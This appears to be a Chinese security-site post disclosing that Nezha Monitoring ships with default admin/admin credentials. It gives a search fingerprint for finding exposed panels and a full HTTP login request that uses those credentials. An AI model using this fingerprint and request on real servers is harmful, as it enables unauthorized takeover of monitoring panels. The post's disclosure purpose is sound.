【哪吒探针】默认弱口令漏洞

127761

一、漏洞信息

哪吒监控(Nezha Monitoring) 是一款广受欢迎的轻量级、开源服务器探针和监控面板。

该“漏洞”并非源于软件代码缺陷,而属于默认配置弱点(Default Credentials Vulnerability)。哪吒监控在安装或初始化后,默认会配置一组固定的管理账号和密码。如果用户在部署后未能及时修改这组默认凭证,攻击者即可利用这些已知的弱口令尝试登录管理面板。

默认凭证:admin / admin

图片[1] - 【哪吒探针】默认弱口令漏洞 - 极核GetShell
哪吒探针

二、应用指纹

icon_hash="-1914242756" || title="哪吒监控"

三、利用细节

POST /api/v1/login HTTP/1.1
Host: 127.0.0.1:8008
Content-Length: 39
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: */*
Origin: http://127.0.0.1:8008
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8008/dashboard/login
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

{"username":"admin","password":"admin"}
图片[2] - 【哪吒探针】默认弱口令漏洞 - 极核GetShell

四、POC文件

THE END
漏洞信息
想说的话 1  QQ & 微信交流群: 点击查看加群方式
2  本站运营不易,以真心❤️换真心💕,如果帮助到你,可以 推荐给朋友 或者 开通金贝会员 支持一下本站!
3  请不要进行任何非授权的网络攻击,如果造成任何损失均由使用者本人负责,与本站和原作者无关!
点赞61 分享
相关推荐
【哪吒探针】默认弱口令漏洞 - 极核GetShell
【哪吒探针】默认弱口令漏洞
【哪吒探针】默认弱口令漏洞
15小时前 277
【Apache ActiveMQ】 远程代码执行漏洞 - 极核GetShell
【Apache ActiveMQ】 远程代码执行漏洞
【Apache ActiveMQ】 远程代码执行漏洞
2年前 1082
【CVE-2025-30208】Vite开发服务器任意文件读取漏洞 - 极核GetShell
【CVE-2025-30208】Vite开发服务器任意文件读取漏洞
【CVE-2025-30208】Vite开发服务器任意文件读取漏洞
8个月前 2329
【CVE-2024-4577】PHP CGI 远程代码执行漏洞 - 极核GetShell
【CVE-2024-4577】PHP CGI 远程代码执行漏洞
【CVE-2024-4577】PHP CGI 远程代码执行漏洞
1年前 2095
【朵米客服平台】任意文件上传漏洞 - 极核GetShell
【朵米客服平台】任意文件上传漏洞
【朵米客服平台】任意文件上传漏洞
1年前 2492
茶谈区 共1条

请登录后发表评论

    只看作者
    • hvvge的头像 - 极核GetShellhvvge徽章-遗失的金糖果 - 极核GetShell等级-LV1 - 极核GetShell0
      沙发。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
      9小时前
【证书培训】网络安全认证课程超低价 - 极核GetShell
极核GetShell - 打破网络安全资源分享边界